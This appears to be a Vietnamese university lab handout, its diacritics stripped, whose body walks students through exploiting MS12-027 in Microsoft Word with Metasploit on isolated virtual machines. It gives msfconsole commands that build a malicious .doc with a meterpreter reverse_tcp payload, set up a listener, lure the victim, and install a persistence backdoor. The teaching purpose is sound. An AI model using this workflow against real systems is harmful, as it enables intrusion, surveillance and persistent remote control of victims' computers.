HC VIN K THUT MT M

KHOA AN TON THNG TIN

MODULE THC HNH

AN TON H IU HNH

BI THC HNH S 01.01i

SAO LU H THNG V D LIUii

Ngi xy dng bi thc hnh:

NG TH THY LINH

H NI, 2015

[Type text]
 MC LC

MC LC ............................................................................................................... 2

THNG TIN CHUNG V BI THC HNH ................................................... 3

CHUN B BI THC HNH ............................................................................ 4

i vi ging vin ................................................................................................... 4

i vi sinh vin ...................................................................................................... 4

PHN 1. KHAI THC L HNG PHN MM BNG METASPLOIT ....... 5

1.1. M hnh bi thc hnh .................................................................................... 5

1.2. Cc bc khai thc .......................................................................................... 6

1.3. Phn tham kho ............................................................................................... 9

-2-
 THNG TIN CHUNG V BI THC HNH
Tn bi thc hnh: Khai thc l hng phn mm bng metasploit
Module:
S lng sinh vin cng thc hin: 01
a im thc hnh: Phng my
Yu cu:
Yu cu phn cng:
Mi sinh vin c b tr 01 my tnh vi cu hnh ti thiu: CPU 2.0 GHz,
RAM 2GB, HDD 50GB
Yu cu phn mm trn my:
VMware Worstation 9.0 tr ln
Cng c thc hnh:
My o VMware: Windows XP SP3, Kali Linux.
Microsoft Office 2007
Yu cu kt ni mng LAN: C
Yu cu kt ni mng Internet: Khng
Yu cu khc: my chiu, bng vit, bt/phn vit bng
Cng c c cung cp cng ti liu ny:

-3-
 CHUN B BI THC HNH

i vi ging vin
Trc bui hc, ging vin (ngi hng dn thc hnh) cn kim tra s
ph hp ca iu kin thc t ca phng thc hnh vi cc yu cu ca bi thc
hnh.
Ngoi ra khng i hi g thm.

i vi sinh vin
Trc khi bt u thc hnh, cn to cc bn sao ca my o s dng.
ng thi xc nh v tr lu tr cc cng c ch ra trong phn yu cu.

-4-
 PHN 1. KHAI THC L HNG PHN MM BNG METASPLOIT
Nh chng ta bit th trnh son tho vn bn ni ting nht v c s
dng ph bin nht hin nay chnh l Microsoft Word nm trong b cng c son
tho Microsoft Office ca hng phn mm Microsoft
Chnh iu ny khin Microsoft Word tr thnh 1 mi trng cho nhng
Hacker li dng c th tn cng , khai thc v nh cp nhngthng tin trn
my ca ngi dng khi ngi dng m mt vn bn c cha m c bn trong.
y l li trn b m c pht hin trong Microsoft Word . Vi li ny
khi ngi dng m ti liu Word s v tnh thc hin nhng on m c hi cho
php k tn cng c quyn iu khin h thng .
Cc ti liu ca Word c th c nhng vo cc ti liu khc trong b
cng c Microsoft Office nh l Excel,PowerPoint V vic m bt c mt ti
liu no c nhng ti liu Word cha m c th on m c cng vn s
c thc thi trn my ca nn nhn.

1.1. M hnh bi thc hnh

My Hacker:
H iu hnh: S dng
Kali Linux
IP: 192.168.121.128
My nn nhn:
H iu hnh: S dng
Windows XP
IP: 192.168.121.126

Vic khai thc l hng

phn mm c thc hin theo
cc bc sau
Bc 1: K tn cng to
ra mt file m c c ui .doc
v gi cho nn nhn.
Bc 2: Bng cch no
(c th to mt web server
gi mo, d nn nhn ti file
v hoc c th gi km theo
mail, ) nn nhn nhn
c v m file c cha m c .

-5-
 Bc 3: File c cha m c s khai thc l hng trn phn mm microsoft
word to mt ca hu cho php kt ni ngc vi my ca k tn cng, gip
cho k tn cng chim c quyn kim sot ca my nn nhn.

1.2. Cc bc khai thc

Bc 1: To file c cha m c
thc hin vic tn cng, Attacker s s dng m un MS12-027
MSCOMCTL ActiveX Buffer Overflow. Module ny khai thc l hng trn b
m trong MSCOMCTL.OCX. N s dng mt tp tin RTF c cha m c
nhng trnh iu khin c bit MSComctlLib.ListViewCtrl.2 vo my ca nn
nhn.
Attacker m Metasploit trn my Kali v chn m dun thc hin tn
cng:
msfconsole
msf > use exploit/windows/fileformat/ms12_027_mscomctl_bof

Tip theo k tn cng s cung cp y cc thng tin nh l payload , a

ch my attacker , port attacker lng nghe tin hnh hon thin file m c v
gi cho nn nhn.
Sau khi cung cp y cc thng tin, module s cp cho k tn cng
mt file m c msf.doc , k tn cng c th thay i tn file nhm ly lng tin
ca nn nhn v d nn nhn ti v m file.
msf exploit(ms12_027_mscomctl_bof) > set FILENAME baithuchanh.doc
msf exploit(ms12_027_mscomctl_bof) > set payload windows
/meterpreter/reverse_tcp

-6-
 Mt trong nhng payload m cc hacker vn thng s dng chnh
l meterpreter v n gin l n kh pht hin, h tr rt nhiu ty chn trong qu
trnh khai thc my nn nhn nh : keylog, webcam, hasdump Trong tham s
command c s dng reverse_tcp l cho php qu trnh kt ni ngc v my ca
k tn cng. C th hiu mt cch n gin l my ca k tn cng s m sn mt
cng cng kt ni ch my victim kt ni vo.
msf exploit(ms12_027_mscomctl_bof) > set LHOST 192.168.121.128
msf exploit(ms12_027_mscomctl_bof) > exploit
msf exploit(ms12_027_mscomctl_bof) > cp /root/. msf4/local/
baithuchanh.doc /root/Desktop

Bc 2: gi file m c cho nn nhn v ch i nn nhn m file

Sau khi file cha m c to xong, k tn cng gi c th ly file ny v
gi cho nn nhn v ch i nn nhn m file bt u vic kt ni ngc tr li
my ca k tn cng.
Trong phm vi ca bi thc hnh, m phng vic nn nhn ti v m file
m c th chng ta c th copy trc tip file sang my nn nhn (window XP SP3)
hoc to mt Webserver ri upload file "baithuhanh.doc" ln nn nhn truy
cp vo v ti file v nh di y:

To ra mt trnh lng nghe

msf exploit(ms12_027_mscomctl_bof) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.119.132
msf exploit(handler) > exploit
-7-
Nn nhn truy cp vo webserver v ti file c cha m c v

Ngay khi nn nhn m file ra th m c c tim vo my.

Bc 3: K tn cng tin hnh khai thc my nn nhn

-8-
 M c c tim t my 192.168.121.128:4444 ti my
192.168.121.126:1048
Nh vy c 1 phin kt ni ti vi my ca nn nhn .
G getuid thy thng tin username, getinfo bit thng tin my, ls C:\
xem a, mkdir to th mc, ni chung k tn cng hon ton kim
xot c my nn nhn.

1.3. Phn tham kho

Khi nn nhn tt file doc i th lp tc session s b ngt kt ni dn n vic
mt kt ni gia my tn cng v my nn nhn . V vy ngay khi c phin kt ni
th k tn cng tin hnh ci BACKDOOR vo my ca nn nhn ngay lp tc
c th kt ni d dng tr li my nn nhn, mi khi nn nhn s dng my tnh
BACKDOOR s lp tc m 1 cng bt k t my ca nn nhn vo kt ni ti a
ch ip v cng ca k tn cng nu k tn cng ang lng nghe th s c 1 session
c m ra.
Tham kho chy BACKDOOR :

-9-
 y ta thy mt s tham s quan trng:
-X khi ng cng h thng
-i khong thi lng nghe gia cc kt ni
-p cng kt ni
-r a ch ip ca my Attacker

To mt files persistence.rc c ni dung nh sau :

- 10 -
 Chy on scripts s dng msfconsole

Nh vy k tn cng c th kt ni quay tr li my nn nhn m khng

cn phi khai thc l hng bo mt ln na.
i
nh s theo s th t bi thc hnh trong tng module. S th t ca module gm 2 ch s v s th t
ca bi trong module gm 2 ch s.
ii
Ly ng tn ca bi thc hnh trong danh sch phn cng

- 11 -